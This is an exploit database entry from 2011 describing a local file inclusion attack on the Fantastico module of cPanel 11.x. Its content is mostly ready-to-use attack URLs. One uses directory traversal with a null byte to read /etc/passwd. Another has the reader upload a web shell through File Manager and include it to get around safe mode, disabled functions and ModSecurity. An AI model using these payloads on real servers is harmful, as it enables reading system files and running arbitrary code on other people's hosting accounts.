cPanel 11.x Fantastico LFI Exploit Vulnerability Security Bypass



EKU-ID: 813 CVE: OSVDB-ID:
Author: ahwak2000 Published: 2011-08-12 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


  cPanel 11.x Fantastico LFI Exploit Vulnerability Security Bypass

_________________________________
#[+]Version.: cPanel 11.x
#[+]Author   : ahwak2000
#[+]Home   : 1337day.com
#[+] Date      : 11.08.2011
#[+] E-mail   :  z.u5[at]hotmail.com
#[+]Tested On : win xp sp3
_________________________________

After you log in the cPanel


[-] LFI eXploit:



http://site.com:2082/frontend/x3/fantastico/user_language.php?language_value=../../../../../../etc/passwd%00ahwak2000&Update=Salva
_________________________________



[-] Security Bypass eXploit:



Upload your shell by "File Manager"



Then Go To:



http://site.com:2082/frontend/x3/fantastico/user_language.php?language_value=../../../../../../home/user/public_html/shell.php%00ahwak2000&Update=Salva


You will find  : SafeMode= OFF , Disable_function : None , ModSecurity =
Off 


_________________________________
_________________________________